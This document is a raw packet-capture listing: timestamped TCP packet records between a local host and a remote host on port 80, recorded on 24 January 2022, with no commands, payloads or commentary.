                                                      Jan 24, 2022 15:31:19.226059914 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226070881 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226083994 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226089001 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226099014 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226105928 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226121902 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226124048 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226131916 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226140022 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226149082 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226156950 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226171017 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226171970 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226188898 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226188898 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226193905 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226205111 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226222038 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226224899 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226232052 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226238012 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226248980 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226254940 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226272106 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226272106 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226280928 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226290941 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226305962 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226305962 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226317883 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226325989 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226334095 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226342916 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226356983 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226357937 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226372957 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226376057 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226382017 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226392984 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226408958 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226412058 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226423979 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226424932 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226438046 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226443052 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226452112 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226459980 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226475954 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226478100 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226490021 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226492882 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.226507902 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.226520061 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.227093935 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.227379084 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.227396965 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.227411985 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.227442980 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.227453947 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.227457047 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228538990 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228564978 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228581905 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228598118 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228607893 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228611946 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228614092 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228617907 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228632927 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228634119 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228646040 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228652000 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228662014 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228668928 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.228688955 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.228698969 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229321003 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229347944 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229372978 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229377985 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229388952 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229389906 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229403019 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229410887 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229427099 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229434013 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229441881 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229449987 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229460001 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229466915 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229476929 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229486942 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229491949 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229496002 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229507923 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229513884 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229531050 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229532957 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229547977 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229563951 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229568005 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229568005 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229574919 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229585886 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229604006 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229604959 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229618073 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229633093 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229684114 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229701042 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229717970 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229722977 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229732990 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229737043 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229752064 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229758024 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229774952 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229777098 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229788065 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229792118 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229805946 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229809999 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229820967 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229825974 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.229856968 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.229860067 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231447935 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231770992 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231795073 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231813908 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231831074 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231841087 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231847048 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231856108 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231865883 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231873989 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231885910 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231889009 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231904030 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231906891 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231920004 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.231923103 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231936932 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.231952906 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.233963966 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.233989000 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234004021 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234019995 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234039068 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234044075 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234056950 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234072924 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234081984 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234088898 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234092951 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234095097 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234100103 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234103918 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234107971 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234112024 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234122038 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234138012 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234147072 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234153032 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234158993 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234172106 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234188080 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234203100 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234219074 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234225988 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234236002 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234242916 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234251976 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234255075 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234268904 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234271049 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234283924 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234286070 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234301090 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234303951 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234314919 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234323025 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234338999 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234353065 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234354019 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234369993 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234374046 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234378099 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234384060 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234386921 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234402895 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.234406948 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234425068 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.234435081 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.235380888 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253339052 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253369093 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253387928 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253397942 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253402948 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253420115 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253422976 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253429890 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253437996 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253443956 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253456116 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253469944 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253472090 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253483057 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253490925 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253498077 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253508091 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253530979 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253534079 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253539085 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253540993 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253552914 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253566027 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253577948 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253597021 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253612995 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253629923 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253647089 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253664017 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253679991 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253694057 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253695011 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253704071 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253705978 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253707886 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253710032 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253711939 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253712893 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253715992 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253717899 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253720045 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253736973 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253750086 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253753901 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253772020 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253772974 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253789902 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253792048 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253799915 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253808022 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253818035 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253824949 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253839016 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253843069 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253858089 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253882885 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253886938 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253906965 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253925085 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253931999 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253941059 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253942013 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253957987 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253968000 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253974915 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253988981 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.253992081 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.253995895 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254007101 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254009008 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254023075 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254025936 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254035950 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254044056 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254054070 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254062891 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254077911 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254081964 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254093885 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254101038 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254111052 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254117966 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254127026 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254133940 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254143953 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254147053 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254160881 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254162073 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254177094 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254179001 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254193068 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254196882 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254209995 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254214048 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254225969 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254231930 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254241943 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254252911 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.254291058 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.254297018 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.255161047 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259440899 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259458065 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259481907 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259499073 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259514093 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259524107 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259531021 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259541988 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259548903 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259561062 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259567022 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259574890 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259583950 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259591103 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259603024 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259623051 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259624958 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259634972 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259639978 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259654045 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259658098 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259670019 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259675980 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259686947 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259696960 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259711027 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259715080 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259728909 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259733915 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259752035 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259752989 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259759903 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259769917 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259785891 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259793043 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259803057 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259804964 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259819984 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259825945 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259838104 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259840965 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259854078 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259865046 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259880066 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259895086 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259910107 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.259979010 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259984016 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259989977 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259993076 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.259999037 CET4916580192.168.2.222.58.149.41
